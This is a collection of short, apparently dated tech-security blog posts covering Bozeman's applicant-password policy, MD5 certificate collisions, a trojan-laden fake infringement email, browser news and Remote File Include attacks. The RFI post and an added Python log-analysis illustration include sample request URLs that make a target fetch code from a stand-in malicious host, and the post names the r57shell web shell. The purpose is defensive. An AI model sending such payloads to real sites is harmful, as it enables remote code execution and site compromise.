All of the press attention on Bozeman’s policy to collect usernames and passwords from job applicants is too much to bear. Or is it? The city has issued a press release stating that it has "permanently ceased the practice of requesting candidates selected for City positions under a provisional job offer to provide user names and passwords for the candidate’s internet sites". The release later states that the city will "suspend its practice of reviewing candidate’s password protected internet information until the City conducts a more comprehensive evaluation of the practice". Which is it? Have they stopped permanently, or will they start up again after their review? How do they ensure that the collected information is not misused? The possibility of identity theft is real. Bozeman staff have not responded to our request for details on how the information is used and protected.
Posted in Security
The City of Bozeman, MT wants to know about your online identity when you apply for a job. Not only that, they want your online identity. The Consent and Release to Conduct a Criminal Background Check form states that applicants must submit usernames and passwords for websites such as Google and Yahoo. The request was for "any and all current personal or business Web sites, web pages or memberships on any Internet-based chat rooms, social clubs or forums". This gives any Bozeman government employee with access to that information the ability not only to access and read information behind the login screen, but also to impersonate and steal that online identity. Besides the fact that it’s completely common sense not to give out account passwords, sharing your password also violates the Terms of Service of most sites. This is causing quite a stir among privacy-conscious netizens. At the time of this writing, the Bozeman website is suffering from the Slashdot effect, with many readers attempting to view the form. Many mainstream news outlets are also starting to pick up on the story.
Posted in Security
Microsoft has slipped a Firefox plugin into the .NET 3.5 and Visual Studio 2008 upgrades. The .NET Framework Assistant plugin was a surprise to many, and it cannot be uninstalled with the Add-on Manager: the Uninstall button is disabled for the plugin. Removing the plugin requires modifying the registry.
Posted in Microsoft
Today, Microsoft released security advisory 961501 regarding SSL certificates that have MD5 signatures. This advisory comes on the heels of the same-day announcement that MD5 signatures are unsafe. While the Microsoft advisory states that they are not aware of specific attacks against MD5, the CCC announcement clearly gives a history in which MD5 hashes have been shown to be vulnerable to hash collisions. The attack was completed using approximately 200 PS3s (yes, Sony PlayStations).
What can be done to prevent the attack? Unfortunately, there’s not much that can be done to defend against it. Creating a rogue CA or certificate is not an attack against a specific website or server; it’s an attack against the CA itself. The best advice that we can give is to use a CA that generates SHA1 signatures, and to warn your customers to avoid MD5-signed certs for your site. Of course, just warning your customers may cause them to panic. Not all SSL certificates with MD5 signatures are fakes, but they are suspect.
Posted in Security
The bad guys are now taking advantage of the much-reported RIAA and MPAA copyright infringement notices that are going out. They are now sending out their own infringement notices in increasing numbers. We received a copy of an email from the "Internet Service Provider Consorcium". According to the email, the purpose of the ISPC is to protect the rights of software authors and artists.
The email stated that the recipient’s internet access was going to be suspended due to illegal activities. The sender was kind enough to provide a report detailing the alleged illegal activities. Unfortunately, the attached file did not contain any report, but instead contained a Windows executable infected with W32/Goldun.AXT. This trojan records activity and posts it to a predetermined web site where the bad guys can pick it up later. The trojan is relatively advanced, and it attempts to cover its tracks by modifying the Windows registry, disguising itself as a Windows service, and disabling firewalls and antivirus applications.
On a good note, many of the popular antivirus applications already detect this threat. If you do receive such an email warning of copyright infringements, be very careful.
Posted in Malware
The recent beta release of Google Chrome has been attracting the attention of a lot of people, namely Google fans, Firefox fans and hackers. Although the reviews are mixed, all of the attention is not necessarily a bad thing. As Google is the search leader, everyone is watching how well Chrome is received.
Built from the ground up, Google Chrome is designed for the Web 2.0 world of AJAX applications and software as a service. Like Firefox, Chrome supports tabbed browsing. One nice distinction is that each tab runs in its own process, which makes managing security much easier. In addition, a site that would normally cause a browser to crash or lock up would be limited to one tab in Chrome. Google is also including a new JavaScript engine called V8.
Some people are already reporting bugs with the new browser, including broken features and security issues. A German official has recommended not using Chrome because of its beta status. Bugs are common in beta applications; it’s user interaction that gets them found and fixed. Chrome, like Firefox, is also open source. The Chrome browser is being fed by the Chromium Project. Versions for Linux and OS X are also in the works.
Firefox and Safari have been slowly making headway into IE territory. Now Chrome enters the fray: Google with dominant search and a new browser versus Microsoft with a dominant browser and new search technology. How will they fare?
Posted in Uncategorized
Microsoft is pushing its new Silverlight plugin on its website’s front page. Billed as the so-called Flash killer, Silverlight is Microsoft’s answer for creating rich internet applications. The What Is Silverlight page mentions custom branded experiences and highly sophisticated RIAs, but is pretty short on details.
Microsoft has a long way to go to establish Silverlight as the Flash killer. Adobe Flash is very popular and is used by many high-traffic websites such as YouTube and Pandora to deliver multimedia content. While the end result is supposed to be cross-platform, Microsoft is only developing the plugin for the Windows and Mac platforms. The plugin for Linux-based systems is being developed by the Mono Project. While Windows and Mac users get a link to the plugin, there is no such link for Linux users.
The push is on to get developers and users. MSNBC, which is a Microsoft/NBC partnership, is offering Olympic video content for the Silverlight plugin. Is the draw to watch the Olympics online enough to get people to install the plugin?

Posted in Microsoft
Dell is continuing to offer Windows XP as a pre-installed operating system on their hardware; however, the choice will cost an extra $50. Even though Vista is the most recent release from Microsoft with many new features, many customers still want XP. The shelf life of XP has already been extended due to the popularity of the many emerging low-end Linux devices. Since Vista cannot compete in this space due to its resource requirements, XP has been pulled in to compete. For example, the most basic Vista Home requires 512MB of memory to operate, while most Linux distributions are quite snappy with 256MB. It’s unknown at this time how many people will take the $50 downgrade option, but there must be considerable market pressure for Dell even to make the offering.
For those who are interested in checking out what the competition offers, we recommend that you take a Linux distribution for a test drive. There are quite a few live CDs that can be run without installing any software on your computer. Ubuntu Linux is a good starting point; it is very end-user friendly. Of course it will not be as fast when running from the CD, but it will give you a good idea of what features are available. In the end, you’ll probably see that all those stories about how hard it is to use Linux are completely untrue.
Posted in Linux
Remote File Include (RFI) attacks appear to be on the rise for some of the sites that we manage. RFI attacks work by attempting to inject malicious code into the target site and having the output displayed inside the target page. This is usually done by passing the URL of the malicious code as a variable value to the target. Frequently the source of the malicious code is a site that has itself been successfully attacked. For example:
http://www.targetsite.com/index.php?var=http://www.previousattack.com/malicious.txt
The attacks varied in complexity, but all of them are scripted: the sequential HTTP requests are too closely timed to be manual attempts. Surprisingly, about 60% of the include attempts are recon attempts, simple scripts that gather information about the target site. We even encountered several versions of the same PHP code that had been rebranded by the attacker. The other popular remote include was r57shell. This tool gives interactive access to the attacker.
Some of the attackers were scanning for known exploits in vulnerable applications. These attackers made the same HTTP request with the malicious include across several virtual hosts, even though the desired vulnerable application was not even installed. This type of attack was not very common. The more frequently used attack was to attempt to include the remote code by trying different variable names such as id, page, and template. A few attackers attempted to avoid detection by using different source IP addresses, but it was relatively easy to group them together because they attempted to include code from the same URL or they had branded their include code.
The ideal defense against this attack is to write clean code that is not susceptible to an include attack. When dealing with variables, the data must be tested for bounds, type, and value. This takes time and attention to detail. Other server-side tools such as ModSecurity can be used to reduce the chance of a successful attack.
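As an added illustration (not code from the original post), the following Python script parses constructed Apache access-log lines, flags any request in which a query parameter carries an absolute URL regardless of the parameter name, and then clusters the attempts by the included URL so that requests from different source IPs fetching the same payload are grouped together, the way the attempts above were tied to one actor. The log lines, IP addresses and hostnames are constructed placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (not real traffic); IPs and hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2008:10:01:02 +0000] "GET /index.php?page=http://www.previousattack.com/malicious.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [12/May/2008:10:01:03 +0000] "GET /index.php?id=http://www.previousattack.com/malicious.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [12/May/2008:10:02:17 +0000] "GET /index.php?template=http://www.previousattack.com/malicious.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.44 - - [12/May/2008:10:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Source IP, request target and status code from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL is the RFI signature, whatever the name (id, page, template, ...).
REMOTE_SCHEME = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_includes(log_text):
    """Return one (src_ip, param_name, include_url) tuple per remote-include attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than crash on junk
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((m.group("ip"), name, value))
    return hits


def cluster_by_include(hits):
    """Group attempts by included URL: several source IPs pulling the same
    payload are, as observed above, almost certainly one scripted actor."""
    clusters = defaultdict(lambda: {"ips": set(), "params": set(), "count": 0})
    for ip, name, url in hits:
        clusters[url]["ips"].add(ip)
        clusters[url]["params"].add(name)
        clusters[url]["count"] += 1
    return dict(clusters)


if __name__ == "__main__":
    for url, c in cluster_by_include(find_remote_includes(SAMPLE_LOG)).items():
        print(f"{url}: {c['count']} attempts from {sorted(c['ips'])} via {sorted(c['params'])}")
```

Feed it a real access log (for example `find_remote_includes(open("access.log").read())`) and each cluster is a candidate for a ModSecurity rule or a block of the included source, independent of the source IPs used.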
Posted in Web Hosting
A recent Slashdot article publicized a recent discovery by the Adium team. For those who are not familiar with Adium, it is a multi-protocol messenger client for the Mac, similar to Pidgin in functionality. After some investigation, they discovered that MSN is censoring certain messages from the channel, and the Adium team is keeping a list in their Wiki. Apparently, there are certain URLs that expose the MSN user to a security vulnerability. It appears that Microsoft has chosen to filter the URLs rather than fix the vulnerabilities behind them. The Wiki list contains several relatively common URL page names like "gallery.php" and "pics.php".
Unfortunately, the community is generally forced to live with the service as provided when it’s free. The big four messenger services (AIM, MSN, Yahoo IM, Google Talk) are pretty good at making their service available (one of the three As of choosing a service). The two As that are lacking are authorization and authenticity. As we can see from this recent discovery, Microsoft is able to intercept the messages.
How do you get around this? It would be pretty difficult to build and implement an IM service that can provide availability, authorization, and authenticity, so the next best thing is to change your client when connecting to these services. One of the side benefits of changing clients is that you can merge all of your buddy lists into one using a multi-protocol client. The nice thing about Adium is that it comes with OTR by default, and enabling this feature provides end-to-end message security. We happen to like Pidgin with the pidgin-encryption and OTR plugins. These two plugins allow users to exchange keys to securely send messages.
In short, take advantage of the availability that messenger services provide, but add your own security to the mix.
Posted in Instant Messaging